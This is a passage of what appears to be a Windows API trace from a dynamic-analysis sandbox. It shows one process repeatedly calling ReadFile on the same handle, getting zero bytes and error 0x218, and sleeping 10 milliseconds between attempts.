	[0196.464] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.464] GetLastError () returned 0x218
	[0196.464] Sleep (dwMilliseconds=0xa) 
	[0196.479] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.479] GetLastError () returned 0x218
	[0196.479] Sleep (dwMilliseconds=0xa) 
	[0196.499] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.499] GetLastError () returned 0x218
	[0196.499] Sleep (dwMilliseconds=0xa) 
	[0196.545] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.546] GetLastError () returned 0x218
	[0196.546] Sleep (dwMilliseconds=0xa) 
	[0196.598] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.598] GetLastError () returned 0x218
	[0196.598] Sleep (dwMilliseconds=0xa) 
	[0196.672] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.672] GetLastError () returned 0x218
	[0196.672] Sleep (dwMilliseconds=0xa) 
	[0196.700] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.700] GetLastError () returned 0x218
	[0196.700] Sleep (dwMilliseconds=0xa) 
	[0196.717] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.717] GetLastError () returned 0x218
	[0196.717] Sleep (dwMilliseconds=0xa) 
	[0196.734] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.734] GetLastError () returned 0x218
	[0196.734] Sleep (dwMilliseconds=0xa) 
	[0196.752] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.752] GetLastError () returned 0x218
	[0196.752] Sleep (dwMilliseconds=0xa) 
	[0196.769] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.769] GetLastError () returned 0x218
	[0196.769] Sleep (dwMilliseconds=0xa) 
	[0196.786] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.787] GetLastError () returned 0x218
	[0196.787] Sleep (dwMilliseconds=0xa) 
	[0196.843] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.843] GetLastError () returned 0x218
	[0196.843] Sleep (dwMilliseconds=0xa) 
	[0196.930] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.930] GetLastError () returned 0x218
	[0196.930] Sleep (dwMilliseconds=0xa) 
	[0196.978] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.978] GetLastError () returned 0x218
	[0196.978] Sleep (dwMilliseconds=0xa) 
	[0197.013] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.013] GetLastError () returned 0x218
	[0197.013] Sleep (dwMilliseconds=0xa) 
	[0197.060] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.060] GetLastError () returned 0x218
	[0197.060] Sleep (dwMilliseconds=0xa) 
	[0197.153] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.154] GetLastError () returned 0x218
	[0197.154] Sleep (dwMilliseconds=0xa) 
	[0197.235] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.235] GetLastError () returned 0x218
	[0197.235] Sleep (dwMilliseconds=0xa) 
	[0197.261] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.262] GetLastError () returned 0x218
	[0197.262] Sleep (dwMilliseconds=0xa) 
	[0197.278] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.278] GetLastError () returned 0x218
	[0197.278] Sleep (dwMilliseconds=0xa) 
	[0197.312] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.312] GetLastError () returned 0x218
	[0197.312] Sleep (dwMilliseconds=0xa) 
	[0197.403] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.403] GetLastError () returned 0x218
	[0197.403] Sleep (dwMilliseconds=0xa) 
	[0197.499] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.499] GetLastError () returned 0x218
	[0197.499] Sleep (dwMilliseconds=0xa) 
	[0197.577] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.578] GetLastError () returned 0x218
	[0197.578] Sleep (dwMilliseconds=0xa) 
	[0197.636] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.636] GetLastError () returned 0x218
	[0197.636] Sleep (dwMilliseconds=0xa) 
	[0197.671] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.671] GetLastError () returned 0x218
	[0197.671] Sleep (dwMilliseconds=0xa) 
	[0197.707] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.707] GetLastError () returned 0x218
	[0197.707] Sleep (dwMilliseconds=0xa) 
	[0197.782] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.782] GetLastError () returned 0x218
	[0197.782] Sleep (dwMilliseconds=0xa) 
	[0197.860] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.860] GetLastError () returned 0x218
	[0197.860] Sleep (dwMilliseconds=0xa) 
	[0197.921] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.922] GetLastError () returned 0x218
	[0197.922] Sleep (dwMilliseconds=0xa) 
	[0197.958] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0197.958] GetLastError () returned 0x218
	[0197.958] Sleep (dwMilliseconds=0xa) 
	[0198.007] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.007] GetLastError () returned 0x218
	[0198.007] Sleep (dwMilliseconds=0xa) 
	[0198.085] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.085] GetLastError () returned 0x218
	[0198.085] Sleep (dwMilliseconds=0xa) 
	[0198.172] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.172] GetLastError () returned 0x218
	[0198.172] Sleep (dwMilliseconds=0xa) 
	[0198.394] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.395] GetLastError () returned 0x218
	[0198.399] Sleep (dwMilliseconds=0xa) 
	[0198.414] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.414] GetLastError () returned 0x218
	[0198.414] Sleep (dwMilliseconds=0xa) 
	[0198.464] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.464] GetLastError () returned 0x218
	[0198.464] Sleep (dwMilliseconds=0xa) 
	[0198.511] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.511] GetLastError () returned 0x218
	[0198.511] Sleep (dwMilliseconds=0xa) 
	[0198.526] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.526] GetLastError () returned 0x218
	[0198.526] Sleep (dwMilliseconds=0xa) 
	[0198.545] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.545] GetLastError () returned 0x218
	[0198.545] Sleep (dwMilliseconds=0xa) 
	[0198.557] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.557] GetLastError () returned 0x218
	[0198.557] Sleep (dwMilliseconds=0xa) 
	[0198.573] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.573] GetLastError () returned 0x218
	[0198.573] Sleep (dwMilliseconds=0xa) 
	[0198.589] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.589] GetLastError () returned 0x218
	[0198.589] Sleep (dwMilliseconds=0xa) 
	[0198.608] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.608] GetLastError () returned 0x218
	[0198.608] Sleep (dwMilliseconds=0xa) 
	[0198.634] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.634] GetLastError () returned 0x218
	[0198.634] Sleep (dwMilliseconds=0xa) 
	[0198.682] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.682] GetLastError () returned 0x218
	[0198.682] Sleep (dwMilliseconds=0xa) 
	[0198.729] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.729] GetLastError () returned 0x218
	[0198.729] Sleep (dwMilliseconds=0xa) 
	[0198.745] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.745] GetLastError () returned 0x218
	[0198.745] Sleep (dwMilliseconds=0xa) 
	[0198.760] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.760] GetLastError () returned 0x218
	[0198.760] Sleep (dwMilliseconds=0xa) 
	[0198.776] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.776] GetLastError () returned 0x218
	[0198.776] Sleep (dwMilliseconds=0xa) 
	[0198.791] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.791] GetLastError () returned 0x218
	[0198.792] Sleep (dwMilliseconds=0xa) 
	[0198.807] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.807] GetLastError () returned 0x218
	[0198.807] Sleep (dwMilliseconds=0xa) 
	[0198.823] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.823] GetLastError () returned 0x218
	[0198.823] Sleep (dwMilliseconds=0xa) 
	[0198.838] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.838] GetLastError () returned 0x218
	[0198.838] Sleep (dwMilliseconds=0xa) 
	[0198.898] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.898] GetLastError () returned 0x218
	[0198.899] Sleep (dwMilliseconds=0xa) 
	[0198.978] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.978] GetLastError () returned 0x218
	[0198.978] Sleep (dwMilliseconds=0xa) 
	[0198.993] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.993] GetLastError () returned 0x218
	[0198.993] Sleep (dwMilliseconds=0xa) 
	[0198.999] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0198.999] GetLastError () returned 0x218
	[0199.000] Sleep (dwMilliseconds=0xa) 
	[0199.010] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.010] GetLastError () returned 0x218
	[0199.010] Sleep (dwMilliseconds=0xa) 
	[0199.025] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.026] GetLastError () returned 0x218
	[0199.026] Sleep (dwMilliseconds=0xa) 
	[0199.041] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.041] GetLastError () returned 0x218
	[0199.041] Sleep (dwMilliseconds=0xa) 
	[0199.057] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.057] GetLastError () returned 0x218
	[0199.057] Sleep (dwMilliseconds=0xa) 
	[0199.072] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.072] GetLastError () returned 0x218
	[0199.072] Sleep (dwMilliseconds=0xa) 
	[0199.088] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.088] GetLastError () returned 0x218
	[0199.088] Sleep (dwMilliseconds=0xa) 
	[0199.135] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.135] GetLastError () returned 0x218
	[0199.135] Sleep (dwMilliseconds=0xa) 
	[0199.179] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.179] GetLastError () returned 0x218
	[0199.179] Sleep (dwMilliseconds=0xa) 
	[0199.206] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.206] GetLastError () returned 0x218
	[0199.206] Sleep (dwMilliseconds=0xa) 
	[0199.213] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.213] GetLastError () returned 0x218
	[0199.213] Sleep (dwMilliseconds=0xa) 
	[0199.228] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.228] GetLastError () returned 0x218
	[0199.228] Sleep (dwMilliseconds=0xa) 
	[0199.244] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.244] GetLastError () returned 0x218
	[0199.244] Sleep (dwMilliseconds=0xa) 
	[0199.260] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.260] GetLastError () returned 0x218
	[0199.260] Sleep (dwMilliseconds=0xa) 
	[0199.275] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.275] GetLastError () returned 0x218
	[0199.275] Sleep (dwMilliseconds=0xa) 
	[0199.291] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.291] GetLastError () returned 0x218
	[0199.291] Sleep (dwMilliseconds=0xa) 
	[0199.306] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.307] GetLastError () returned 0x218
	[0199.307] Sleep (dwMilliseconds=0xa) 
	[0199.353] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0199.353] GetLastError () returned 0x218
	[0199.353] Sleep (dwMilliseconds=0xa) 
